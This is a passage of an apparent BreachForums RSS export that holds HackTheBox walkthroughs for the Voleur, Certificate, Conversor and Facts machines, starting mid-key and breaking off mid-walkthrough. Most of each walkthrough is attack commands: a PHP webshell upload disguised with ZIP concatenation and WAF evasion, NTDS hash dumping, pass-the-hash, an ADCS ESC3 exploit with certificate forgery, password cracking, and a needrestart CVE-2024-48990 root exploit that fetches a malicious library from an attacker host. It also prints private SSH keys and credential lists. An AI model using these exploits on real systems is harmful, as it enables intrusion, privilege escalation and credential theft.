lOwP+sY7+rXOTA2nJ3qE0J8gGEiS8DFzPOF80OLrAAAFiIygOJSMoDiUAAAAB3NzaC1yc2<br />
EAAAGBAKhcjzL1EVv6m8kZXpgDM2j1b30eyTR85y+sQxz+KP4aliM593Weuj9mm7DIGctl<br />
1xn9qTtDNd1InYgWhd3SzS+2NUnkvwzIrBONdcx8egEDHqY9DBgYv3NVH4u61TKvl+jSZ2<br />
9r+aQs6aMqGzjVqKwVzClfQ520LplsWFykMq+r4Eqy3dyQVukzWWtz1k4cvcK00TnoHWGq<br />
go85Nz7HHLeuj4ZkD8lpHlWyBmQKhAv3nXzjc5mYzG5+3bicCC+XOvDDLgovbvdTAORQIo<br />
JzbYL72FYav6S5IXCpIdXokdNU8lJnh1SYQUC8Fc3BzXVZPhjvjc4ckTqrsYWmlY3DvC9y<br />
jD2DVGZf3OKL/NCBtOIQLwECBsjbwD7hFxpyxIikXDYPpryOv7CyHFOaEJDyTO1xZXo0ih<br />
34CXD9VtzDAwGCqZALmUycEj/SElVZY+Ef5X1tfLSool7soDhrnZtwG2OuQpTsD/rGO/q1<br />
zkwNpyd6hNCfIBhIkvAxczzhfNDi6wAAAAMBAAEAAAGBAIrVgPSZaI47s5l6hSm/gfZsZl<br />
p8N5lD4nTKjbFr2SvpiqNT2r8wfA9qMrrt12+F9IInThVjkBiBF/6v7AYHHlLY40qjCfSl<br />
ylh5T4mnoAgTpYOaVc3NIpsdt9zG3aZlbFR+pPMZzAvZSXTWdQpCDkyR0QDQ4PY8Li0wTh<br />
FfCbkZd+TBaPjIQhMd2AAmzrMtOkJET0B8KzZtoCoxGWB4WzMRDKPbAbWqLGyoWGLI1Sj1<br />
MPZareocOYBot7fTW2C7SHXtPFP9+kagVskAvaiy5Rmv2qRfu9Lcj2TfCVXdXbYyxTwoJF<br />
ioxGl+PfiieZ6F8v4ftWDwfC+Pw2sD8ICK/yrnreGFNxdPymck+S8wPmxjWC/p0GEhilK7<br />
wkr17GgC30VyLnOuzbpq1tDKrCf8VA4aZYBIh3wPfWFEqhlCvmr4sAZI7B+7eBA9jTLyxq<br />
3IQpexpU8BSz8CAzyvhpxkyPXsnJtUQ8OWph1ltb9aJCaxWmc1r3h6B4VMjGILMdI/KQAA<br />
AMASKeZiz81mJvrf2C5QgURU4KklHfgkSI4p8NTyj0WGAOEqPeAbdvj8wjksfrMC004Mfa<br />
b/J+gba1MVc7v8RBtKHWjcFe1qSNSW2XqkQwxKb50QD17TlZUaOJF2ZSJi/xwDzX+VX9r+<br />
vfaTqmk6rQJl+c3sh+nITKBN0u7Fr/ur0/FQYQASJaCGQZvdbw8Fup4BGPtxqFKETDKC09<br />
41/zTd5viNX38LVig6SXhTYDDL3eyT5DE6SwSKleTPF+GsJLgAAADBANMs31CMRrE1ECBZ<br />
sP+4rqgJ/GQn4ID8XIOG2zti2pVJ0dx7I9nzp7NFSrE80Rv8vH8Ox36th/X0jme1AC7jtR<br />
B+3NLjpnGA5AqcPklI/lp6kSzEigvBl4nOz07fj3KchOGCRP3kpC5fHqXe24m3k2k9Sr+E<br />
a29s98/18SfcbIOHWS4AUpHCNiNskDHXewjRJxEoE/CjuNnrVIjzWDTwTbzqQV+FOKOXoV<br />
B9NzMi0MiCLy/HJ4dwwtce3sssxUk7pQAAAMEAzBk3mSKy7UWuhHExrsL/jzqxd7bVmLXU<br />
EEju52GNEQL1TW4UZXVtwhHYrb0Vnu0AE+r/16o0gKScaa+lrEeQqzIARVflt7ZpJdpl3Z<br />
fosiR4pvDHtzbqPVbixqSP14oKRSeswpN1Q50OnD11tpIbesjH4ZVEXv7VY9/Z8VcooQLW<br />
GSgUcaD+U9Ik13vlNrrZYs9uJz3aphY6Jo23+7nge3Ui7ADEvnD3PAtzclU3xMFyX9Gf+9<br />
RveMEYlXZqvJ9PAAAADXN2Y19iYWNrdXBAREMBAgMEBQ==<br />
-----END OPENSSH PRIVATE KEY-----<br />
<br />
SSH access via WSL<br />
--------------------------------<br />
chmod 400 id_rsa<br />
ssh -p 2222 -i id_rsa svc_backup@voleur.htb<br />
<br />
AD Database extract<br />
----------------------<br />
Found in /mnt/c/IT/THIRD-LINE SUPPORT/:<br />
./Active Directory: ntds.dit ntds.jfm<br />
./registry: SECURITY SYSTEM<br />
<br />
Extract NTLM hashes:<br />
secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit LOCAL<br />
<br />
Administrator hash:<br />
administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::<br />
<br />
Admin Access<br />
-----------<br />
getTGT.py -dc-ip 10.10.11.76 -hashes :e656e07c56d831611b577b160b259ad2 voleur.htb/administrator<br />
export KRB5CCNAME=FILE:administrator.ccache<br />
evil-winrm -i dc.voleur.htb -k -u administrator -r VOLEUR.HTB<br />
<br />
CREDENTIALS SUMMARY (for noobs)<br />
-------------------<br />
ryan.naylor:HollowOct31Nyt (Initial access)<br />
Todd.Wolfe:NightT1meP1dg3on14 (Restored account)<br />
svc_ldap:M1XyC9pW7qT5Vn (Excel file)<br />
svc_iis:N5pXyW1VqM7CZ8 (Excel file)<br />
svc_winrm:AFireInsidedeOzarctica980219afi (Kerberoasted)<br />
jeremy.combs:qT3V9pLXyN7W4m (DPAPI)<br />
administrator:e656e07c56d831611b577b160b259ad2 (NTDS dump)]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[HTB - CERTIFICATE.HTB - HARD WINDOWS]]></title>
			<link>https://breachforums.rs/Thread-HTB-CERTIFICATE-HTB-HARD-WINDOWS</link>
			<pubDate>Tue, 10 Feb 2026 00:49:01 +0800</pubDate>
			<dc:creator><![CDATA[<a href="https://breachforums.rs/member.php?action=profile&uid=372312">chain</a>]]></dc:creator>
			<guid isPermaLink="false">https://breachforums.rs/Thread-HTB-CERTIFICATE-HTB-HARD-WINDOWS</guid>
			<description><![CDATA[CERTIFICATE - HACKTHEBOX<br />
WINDOWS - HARD<br />
(if you want my detailed cheat sheet with more explanations just ask)<br />
<br />
IP: 10.10.11.71<br />
Hostname: certificate.htb<br />
Domain: CERTIFICATE.HTB<br />
<br />
Initial access<br />
----------------------------------------<br />
Web app has file upload restrictions - bypassed via ZIP concatenation<br />
<br />
Exploit:<br />
echo "test" &gt; good.pdf<br />
echo "&lt;?php sys/tem(\&#36;_GET['cmd']); ?&gt;" &gt; x.php (REMOVE THE SLASH IN SYSTEM, ITS JUST 4 WAF BYPASS)<br />
zip good.zip good.pdf<br />
zip bad.zip x.php<br />
cat good.zip bad.zip &gt; final.zip<br />
<br />
Upload at: <a href="http://certificate.htb/upload.php?s_id=44" target="_blank" rel="noopener" class="mycode_url">http://certificate.htb/upload.php?s_id=44</a><br />
Upload final.zip -&gt; access webshell via x.php as xamppuser<br />
<br />
DB Enum<br />
--------------------<br />
Found creds in db.php: certificate_webapp_user:cert!f!c@teDBPWD<br />
<br />
MySQL queries (non-interactive shell): <a href="https://pastebin.com/Ni8az3vw" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/Ni8az3vw</a> (waf blocked me)<br />
<br />
Extracted hash:<br />
sara.b:&#36;2y&#36;04&#36;CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6<br />
(other hashes didn't crack)<br />
<br />
Cracked with hashcat:<br />
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt<br />
Result: sara.b:Blink182<br />
<br />
WINRM + PCAP Analysis<br />
---------------------<br />
evil-winrm -u "sara.b" -p "Blink182" -i "10.10.11.71"<br />
<br />
Found Kerberos AS-REQ in ~/ws-01/WS-01PktMon.pcap<br />
<br />
Extract cipher with tshark:<br />
tshark -r WS-01PktMon.pcap -Y "kerberos.msg_type==10 &amp;&amp; kerberos.CNameString &amp;&amp; kerberos.realm &amp;&amp; kerberos.cipher" -T fields -e kerberos.CNameString -e kerberos.realm -e kerberos.cipher<br />
<br />
Cipher: 23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0<br />
<br />
Format for hashcat:<br />
&#36;krb5pa&#36;18&#36;Lion.SK&#36;CERTIFICATE.HTB&#36;23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0<br />
<br />
Crack:<br />
hashcat -m 19900 hash.txt /usr/share/wordlists/rockyou.txt -a 0<br />
Result: lion.sk:!QAZ2wsx<br />
<br />
ADCS ESC3 EXPLOIT<br />
----------------------<br />
evil-winrm -u "lion.sk" -p "!QAZ2wsx" -i "10.10.11.71"<br />
<br />
Enumerate ADCS:<br />
certipy find -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -vulnerable<br />
<br />
ESC3 conditions found:<br />
- Extended Key Usage: Certificate Request Agent<br />
- Enrollment Rights: CERTIFICATE.HTB\Domain CRA Managers (lion.sk is member)<br />
- Authorized Signatures Required: 0<br />
- Private Key Flag: ExportableKey<br />
<br />
Exploit ESC3:<br />
# Step 1: Request delegation cert<br />
certipy req -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'<br />
<br />
# Step 2: Request cert on behalf of ryan.k<br />
certipy req -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -ca 'Certificate-LTD-CA' -template 'SignedUser' -on-behalf-of ryan.k -pfx lion.sk.pfx<br />
(for -template use one with client auth enabled and lion.sk enrollment rights)<br />
<br />
# Step 3: Auth with cert<br />
ntpdate certificate.htb<br />
certipy auth -pfx ryan.k.pfx<br />
<br />
Got NTLM hash:<br />
ryan.k@certificate.htb: aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6<br />
<br />
Privesc<br />
----------------------------------<br />
evil-winrm -u "ryan.k" -H "b1bc3d70e70f4f36b1509a65ae1a2ae6" -i 10.10.11.71<br />
<br />
Download and run SeManageVolumeExploit: <a href="https://github.com/CsEnox/SeManageVolumeExploit/releases/tag/public" target="_blank" rel="noopener" class="mycode_url">https://github.com/CsEnox/SeManageVolume...tag/public</a><br />
<br />
Verify with: icacls C:/windows<br />
Should show BUILTIN\Users with (M) modify permissions<br />
(if you see "administrator" instead of "users" rerun exploit)<br />
<br />
CA private key extract<br />
---------------------------------<br />
(tried DLL hijacking but EDR blocked it :trolled<img src="https://breachforums.rs/images/smilies/smile.png" alt="Smile" title="Smile" class="smilie smilie_1" /><br />
<br />
Export CA private key:<br />
certutil -exportPFX my "Certificate-LTD-CA" C:\temp\x.pfx<br />
Download x.pfx to attacker box<br />
<br />
Forge admin cert:<br />
certipy forge -ca-pfx x.pfx -upn 'administrator@certificate.htb' -out system.pfx<br />
<br />
Auth as admin:<br />
ntpdate certificate.htb<br />
certipy auth -pfx system.pfx<br />
<br />
Got admin hash:<br />
administrator@certificate.htb: aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6<br />
<br />
Credential summary (for noobs)<br />
-------------------------------------------<br />
sara.b:Blink182 (WinRM)<br />
lion.sk:!QAZ2wsx (WinRM)<br />
certificate_webapp_user:cert!f!c@teDBPWD (MySQL)<br />
ryan.k:b1bc3d70e70f4f36b1509a65ae1a2ae6 (Pass-the-Hash)<br />
administrator:d804304519bf0143c14cbf1c024408c6 (Pass-the-Hash)]]></description>
			<content:encoded><![CDATA[CERTIFICATE - HACKTHEBOX<br />
WINDOWS - HARD<br />
(if you want my detailed cheat sheet with more explanations just ask)<br />
<br />
IP: 10.10.11.71<br />
Hostname: certificate.htb<br />
Domain: CERTIFICATE.HTB<br />
<br />
Initial access<br />
----------------------------------------<br />
Web app has file upload restrictions - bypassed via ZIP concatenation<br />
<br />
Exploit:<br />
echo "test" &gt; good.pdf<br />
echo "&lt;?php sys/tem(\&#36;_GET['cmd']); ?&gt;" &gt; x.php (REMOVE THE SLASH IN SYSTEM, ITS JUST 4 WAF BYPASS)<br />
zip good.zip good.pdf<br />
zip bad.zip x.php<br />
cat good.zip bad.zip &gt; final.zip<br />
<br />
Upload at: <a href="http://certificate.htb/upload.php?s_id=44" target="_blank" rel="noopener" class="mycode_url">http://certificate.htb/upload.php?s_id=44</a><br />
Upload final.zip -&gt; access webshell via x.php as xamppuser<br />
<br />
DB Enum<br />
--------------------<br />
Found creds in db.php: certificate_webapp_user:cert!f!c@teDBPWD<br />
<br />
MySQL queries (non-interactive shell): <a href="https://pastebin.com/Ni8az3vw" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/Ni8az3vw</a> (waf blocked me)<br />
<br />
Extracted hash:<br />
sara.b:&#36;2y&#36;04&#36;CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6<br />
(other hashes didn't crack)<br />
<br />
Cracked with hashcat:<br />
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt<br />
Result: sara.b:Blink182<br />
<br />
WINRM + PCAP Analysis<br />
---------------------<br />
evil-winrm -u "sara.b" -p "Blink182" -i "10.10.11.71"<br />
<br />
Found Kerberos AS-REQ in ~/ws-01/WS-01PktMon.pcap<br />
<br />
Extract cipher with tshark:<br />
tshark -r WS-01PktMon.pcap -Y "kerberos.msg_type==10 &amp;&amp; kerberos.CNameString &amp;&amp; kerberos.realm &amp;&amp; kerberos.cipher" -T fields -e kerberos.CNameString -e kerberos.realm -e kerberos.cipher<br />
<br />
Cipher: 23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0<br />
<br />
Format for hashcat:<br />
&#36;krb5pa&#36;18&#36;Lion.SK&#36;CERTIFICATE.HTB&#36;23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0<br />
<br />
Crack:<br />
hashcat -m 19900 hash.txt /usr/share/wordlists/rockyou.txt -a 0<br />
Result: lion.sk:!QAZ2wsx<br />
<br />
ADCS ESC3 EXPLOIT<br />
----------------------<br />
evil-winrm -u "lion.sk" -p "!QAZ2wsx" -i "10.10.11.71"<br />
<br />
Enumerate ADCS:<br />
certipy find -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -vulnerable<br />
<br />
ESC3 conditions found:<br />
- Extended Key Usage: Certificate Request Agent<br />
- Enrollment Rights: CERTIFICATE.HTB\Domain CRA Managers (lion.sk is member)<br />
- Authorized Signatures Required: 0<br />
- Private Key Flag: ExportableKey<br />
<br />
Exploit ESC3:<br />
# Step 1: Request delegation cert<br />
certipy req -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'<br />
<br />
# Step 2: Request cert on behalf of ryan.k<br />
certipy req -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -ca 'Certificate-LTD-CA' -template 'SignedUser' -on-behalf-of ryan.k -pfx lion.sk.pfx<br />
(for -template use one with client auth enabled and lion.sk enrollment rights)<br />
<br />
# Step 3: Auth with cert<br />
ntpdate certificate.htb<br />
certipy auth -pfx ryan.k.pfx<br />
<br />
Got NTLM hash:<br />
ryan.k@certificate.htb: aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6<br />
<br />
Privesc<br />
----------------------------------<br />
evil-winrm -u "ryan.k" -H "b1bc3d70e70f4f36b1509a65ae1a2ae6" -i 10.10.11.71<br />
<br />
Download and run SeManageVolumeExploit: <a href="https://github.com/CsEnox/SeManageVolumeExploit/releases/tag/public" target="_blank" rel="noopener" class="mycode_url">https://github.com/CsEnox/SeManageVolume...tag/public</a><br />
<br />
Verify with: icacls C:/windows<br />
Should show BUILTIN\Users with (M) modify permissions<br />
(if you see "administrator" instead of "users" rerun exploit)<br />
<br />
CA private key extract<br />
---------------------------------<br />
(tried DLL hijacking but EDR blocked it :trolled<img src="https://breachforums.rs/images/smilies/smile.png" alt="Smile" title="Smile" class="smilie smilie_1" /><br />
<br />
Export CA private key:<br />
certutil -exportPFX my "Certificate-LTD-CA" C:\temp\x.pfx<br />
Download x.pfx to attacker box<br />
<br />
Forge admin cert:<br />
certipy forge -ca-pfx x.pfx -upn 'administrator@certificate.htb' -out system.pfx<br />
<br />
Auth as admin:<br />
ntpdate certificate.htb<br />
certipy auth -pfx system.pfx<br />
<br />
Got admin hash:<br />
administrator@certificate.htb: aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6<br />
<br />
Credential summary (for noobs)<br />
-------------------------------------------<br />
sara.b:Blink182 (WinRM)<br />
lion.sk:!QAZ2wsx (WinRM)<br />
certificate_webapp_user:cert!f!c@teDBPWD (MySQL)<br />
ryan.k:b1bc3d70e70f4f36b1509a65ae1a2ae6 (Pass-the-Hash)<br />
administrator:d804304519bf0143c14cbf1c024408c6 (Pass-the-Hash)]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[HTB - CONVERSOR.HTB - EASY LINUX]]></title>
			<link>https://breachforums.rs/Thread-HTB-CONVERSOR-HTB-EASY-LINUX</link>
			<pubDate>Tue, 10 Feb 2026 00:36:42 +0800</pubDate>
			<dc:creator><![CDATA[<a href="https://breachforums.rs/member.php?action=profile&uid=372312">chain</a>]]></dc:creator>
			<guid isPermaLink="false">https://breachforums.rs/Thread-HTB-CONVERSOR-HTB-EASY-LINUX</guid>
			<description><![CDATA[CONVERSOR - HACKTHEBOX<br />
LINUX - EASY<br />
IP: 10.10.11.1 (OLD)<br />
<br />
recon<br />
-----<br />
nmap -sS -sV -sC -p- --min-rate=10000 -T5 --max-retries=2 --defeat-rst-ratelimit -Pn -oN nmap.txt 10.10.11.1 (ctf command)<br />
<br />
22/tcp - SSH OpenSSH 8.9p1<br />
80/tcp - HTTP Apache httpd 2.4.52<br />
<br />
Interesting endpoint:<br />
/convert - XML/XSLT template upload<br />
<br />
inital access<br />
------------------------------<br />
App allows XSLT template uploads. Downloaded source code, install.md reveals cron job executes all Python scripts in /scripts/ every minute.<br />
<br />
Malicious XSLT payload: <a href="https://pastebin.com/yXUvZ8es" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/yXUvZ8es</a> (bf block me <img src="https://breachforums.rs/images/smilies/sad.png" alt="Sad" title="Sad" class="smilie smilie_8" /> )<br />
<br />
Get shell:<br />
1. Start listener<br />
2. Upload payload via web interface<br />
3. Wait for cron job execution (every 1 min)<br />
4. python3 -c 'import pty;pty.spawn("/bin/bash")'<br />
<br />
Credentials extract<br />
----------------------------------<br />
Source code contains SQLite DB users.db<br />
<br />
sqlite3 users.db<br />
.tables<br />
S/ELECT * F/ROM users; (remove the slash, waf block me)<br />
<br />
MD5 hash:<br />
fismathack:5b5c3ac3a1c897c94caad48e6c71fdec<br />
<br />
Cracked via CrackStation:<br />
fismathack:Keepmesafeandwarm<br />
<br />
SSH access:<br />
ssh fismathack@conversor.htb<br />
<br />
Privesc<br />
-------<br />
sudo -l<br />
<br />
User fismathack may run the following commands on conversor:<br />
    (ALL : ALL) NOPASSWD: /usr/sbin/needrestart<br />
<br />
Check version:<br />
/usr/sbin/needrestart --version<br />
<br />
needrestart 3.7 - Restart daemons after library updates.<br />
<br />
Vulnerable to CVE-2024-48990 (patched in 3.8)<br />
<br />
CVE-2024-48990 Exploit<br />
---------------------------<br />
Vuln allows Python injection via PYTHONPATH when needrestart runs with sudo<br />
<br />
Create malicious shared object (exploit.c): <a href="https://pastebin.com/cVZYXxRx" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/cVZYXxRx</a><br />
<br />
Compile:<br />
gcc -shared -fPIC -o __init__.so exploit.c<br />
<br />
exploit.sh:<br />
#!/bin/bash<br />
set -e<br />
<br />
cd /tmp<br />
mkdir -p malicious/importlib<br />
<br />
curl <a href="http://10.10.1X.X:8000/__init__.so" target="_blank" rel="noopener" class="mycode_url">http://10.10.1X.X:8000/__init__.so</a> -o /tmp/malicious/importlib/__init__.so<br />
<br />
/tmp/malicious/expl.py : <a href="https://pastebin.com/necqG4Tx" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/necqG4Tx</a><br />
<br />
cd /tmp/malicious<br />
PYTHONPATH="&#36;PWD" python3 expl.py 2&gt;/dev/null<br />
<br />
Terminal 1 (attacker):<br />
python3 -m http.server 8000<br />
<br />
Terminal 2 (victim - ssh #1):<br />
bash exploit.sh<br />
<br />
Terminal 3 (victim - ssh #2):<br />
sudo /usr/sbin/needrestart<br />
<br />
expl.py script detects SUID shell creation and executes it automatically<br />
<br />
whoami<br />
# root<br />
<br />
cat /root/root.txt<br />
<br />
Credentials summary (4 noob)<br />
-------------------<br />
fismathack:Keepmesafeandwarm (SSH)<br />
<br />
<br />
---<br />
<br />
reuploadin my old writeups not available on breachforums here, if a box already has a writeup i dont reupload, like the seasonal room pterodactyl]]></description>
			<content:encoded><![CDATA[CONVERSOR - HACKTHEBOX<br />
LINUX - EASY<br />
IP: 10.10.11.1 (OLD)<br />
<br />
recon<br />
-----<br />
nmap -sS -sV -sC -p- --min-rate=10000 -T5 --max-retries=2 --defeat-rst-ratelimit -Pn -oN nmap.txt 10.10.11.1 (ctf command)<br />
<br />
22/tcp - SSH OpenSSH 8.9p1<br />
80/tcp - HTTP Apache httpd 2.4.52<br />
<br />
Interesting endpoint:<br />
/convert - XML/XSLT template upload<br />
<br />
inital access<br />
------------------------------<br />
App allows XSLT template uploads. Downloaded source code, install.md reveals cron job executes all Python scripts in /scripts/ every minute.<br />
<br />
Malicious XSLT payload: <a href="https://pastebin.com/yXUvZ8es" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/yXUvZ8es</a> (bf block me <img src="https://breachforums.rs/images/smilies/sad.png" alt="Sad" title="Sad" class="smilie smilie_8" /> )<br />
<br />
Get shell:<br />
1. Start listener<br />
2. Upload payload via web interface<br />
3. Wait for cron job execution (every 1 min)<br />
4. python3 -c 'import pty;pty.spawn("/bin/bash")'<br />
<br />
Credentials extract<br />
----------------------------------<br />
Source code contains SQLite DB users.db<br />
<br />
sqlite3 users.db<br />
.tables<br />
S/ELECT * F/ROM users; (remove the slash, waf block me)<br />
<br />
MD5 hash:<br />
fismathack:5b5c3ac3a1c897c94caad48e6c71fdec<br />
<br />
Cracked via CrackStation:<br />
fismathack:Keepmesafeandwarm<br />
<br />
SSH access:<br />
ssh fismathack@conversor.htb<br />
<br />
Privesc<br />
-------<br />
sudo -l<br />
<br />
User fismathack may run the following commands on conversor:<br />
    (ALL : ALL) NOPASSWD: /usr/sbin/needrestart<br />
<br />
Check version:<br />
/usr/sbin/needrestart --version<br />
<br />
needrestart 3.7 - Restart daemons after library updates.<br />
<br />
Vulnerable to CVE-2024-48990 (patched in 3.8)<br />
<br />
CVE-2024-48990 Exploit<br />
---------------------------<br />
Vuln allows Python injection via PYTHONPATH when needrestart runs with sudo<br />
<br />
Create malicious shared object (exploit.c): <a href="https://pastebin.com/cVZYXxRx" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/cVZYXxRx</a><br />
<br />
Compile:<br />
gcc -shared -fPIC -o __init__.so exploit.c<br />
<br />
exploit.sh:<br />
#!/bin/bash<br />
set -e<br />
<br />
cd /tmp<br />
mkdir -p malicious/importlib<br />
<br />
curl <a href="http://10.10.1X.X:8000/__init__.so" target="_blank" rel="noopener" class="mycode_url">http://10.10.1X.X:8000/__init__.so</a> -o /tmp/malicious/importlib/__init__.so<br />
<br />
/tmp/malicious/expl.py : <a href="https://pastebin.com/necqG4Tx" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/necqG4Tx</a><br />
<br />
cd /tmp/malicious<br />
PYTHONPATH="&#36;PWD" python3 expl.py 2&gt;/dev/null<br />
<br />
Terminal 1 (attacker):<br />
python3 -m http.server 8000<br />
<br />
Terminal 2 (victim - ssh #1):<br />
bash exploit.sh<br />
<br />
Terminal 3 (victim - ssh #2):<br />
sudo /usr/sbin/needrestart<br />
<br />
expl.py script detects SUID shell creation and executes it automatically<br />
<br />
whoami<br />
# root<br />
<br />
cat /root/root.txt<br />
<br />
Credentials summary (4 noob)<br />
-------------------<br />
fismathack:Keepmesafeandwarm (SSH)<br />
<br />
<br />
---<br />
<br />
reuploadin my old writeups not available on breachforums here, if a box already has a writeup i dont reupload, like the seasonal room pterodactyl]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[Season10] USER Pterodactyl]]></title>
			<link>https://breachforums.rs/Thread-Season10-USER-Pterodactyl</link>
			<pubDate>Sun, 08 Feb 2026 10:22:41 +0800</pubDate>
			<dc:creator><![CDATA[<a href="https://breachforums.rs/member.php?action=profile&uid=665666">pulsebreaker</a>]]></dc:creator>
			<guid isPermaLink="false">https://breachforums.rs/Thread-Season10-USER-Pterodactyl</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align">
<div class="hidden-content rounded" style="border-radius: 8px; overflow: hidden;">
    <div class="hidden-content__title">
      <span class="hidden-content__custom-title">Hidden Content</span><i class="fa fa-eye" style="float:right; color:var(--theme-secondary-color);"></i><br />
    </div>
    <div class="hidden-content__main">You must <a href="https://breachforums.rs/member.php?action=register">register</a> or <a href="https://breachforums.rs/member.php?action=login">login</a> to view this content.</div>
  </div>
</div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align">
<div class="hidden-content rounded" style="border-radius: 8px; overflow: hidden;">
    <div class="hidden-content__title">
      <span class="hidden-content__custom-title">Hidden Content</span><i class="fa fa-eye" style="float:right; color:var(--theme-secondary-color);"></i><br />
    </div>
    <div class="hidden-content__main">You must <a href="https://breachforums.rs/member.php?action=register">register</a> or <a href="https://breachforums.rs/member.php?action=login">login</a> to view this content.</div>
  </div>
</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[Season10] ROOT Pterodactyl]]></title>
			<link>https://breachforums.rs/Thread-Season10-ROOT-Pterodactyl</link>
			<pubDate>Sun, 08 Feb 2026 07:07:30 +0800</pubDate>
			<dc:creator><![CDATA[<a href="https://breachforums.rs/member.php?action=profile&uid=665666">pulsebreaker</a>]]></dc:creator>
			<guid isPermaLink="false">https://breachforums.rs/Thread-Season10-ROOT-Pterodactyl</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align">
<div class="hidden-content rounded" style="border-radius: 8px; overflow: hidden;">
    <div class="hidden-content__title">
      <span class="hidden-content__custom-title">Hidden Content</span><i class="fa fa-eye" style="float:right; color:var(--theme-secondary-color);"></i><br />
    </div>
    <div class="hidden-content__main">You must <a href="https://breachforums.rs/member.php?action=register">register</a> or <a href="https://breachforums.rs/member.php?action=login">login</a> to view this content.</div>
  </div>
</div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align">
<div class="hidden-content rounded" style="border-radius: 8px; overflow: hidden;">
    <div class="hidden-content__title">
      <span class="hidden-content__custom-title">Hidden Content</span><i class="fa fa-eye" style="float:right; color:var(--theme-secondary-color);"></i><br />
    </div>
    <div class="hidden-content__main">You must <a href="https://breachforums.rs/member.php?action=register">register</a> or <a href="https://breachforums.rs/member.php?action=login">login</a> to view this content.</div>
  </div>
</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[HTB - FACTS.HTB - EASY LINUX]]></title>
			<link>https://breachforums.rs/Thread-HTB-FACTS-HTB-EASY-LINUX</link>
			<pubDate>Thu, 05 Feb 2026 16:36:37 +0800</pubDate>
			<dc:creator><![CDATA[<a href="https://breachforums.rs/member.php?action=profile&uid=372312">chain</a>]]></dc:creator>
			<guid isPermaLink="false">https://breachforums.rs/Thread-HTB-FACTS-HTB-EASY-LINUX</guid>
			<description><![CDATA[FACTS - HACKTHEBOX<br />
LINUX - EASY<br />
IP: 10.129.69.95 (ull have a different ip)<br />
<br />
users<br />
-----<br />
william<br />
trivia<br />
<br />
recon<br />
-----<br />
nmap -sS -sV -sC -p- --min-rate=10000 -T5 --max-retries=2 --defeat-rst-ratelimit -Pn -oN nmap.txt 10.129.69.95 (ctf only)<br />
<br />
22/OpenSSH 9.9p1<br />
80/nginx 1.26.3<br />
    - path traversal on CameleonCMS 2.9.0 CVE-2024-46987 (base vuln version 2.8.0 but works on 2.9.0)<br />
54321/http <br />
<br />
exploit<br />
------------<br />
<br />
grabbed /home/trivia/.ssh/id_ed25519 via path traversal:<br />
<a href="http://facts.htb/admin/media/download_private_file?file=,,/,,/,,/,,/,,/,,/home/trivia/.ssh/id_ed25519" target="_blank" rel="noopener" class="mycode_url">http://facts.htb/admin/media/download_pr...id_ed25519</a> (remplate , by . for the path, BF block me)<br />
<br />
-----BEGIN OPENSSH PRIVATE KEY-----<br />
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCd4lFW9D<br />
oZ28sQDBe+ZIltAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAILNlyBF4wULHGQax<br />
bUqV/3L712nR8jkzuG2DHrCPy9r/AAAAoILU2uUq5EuFWxb49m7/O1r+jOXkqJFPDFW3Sx<br />
64HaSutBpMBTpNIWf6RviD/iEjRXHM7dKr6LBzu6PiZ3iA82tlbhAKqfZ9WvWYINhYxiQL<br />
G3jKAVqOn5q6D7s5NSxOe6mOW1d5fshHZXKBqqU3WOt9Wvh9/yCZovIhIRK7/GcXCZdTVY<br />
1Mce3bg0ERwrOixPG5d0SvnvdSLvIzcvaI/+w=<br />
-----END OPENSSH PRIVATE KEY-----<br />
<br />
bruteforced the passphrase:<br />
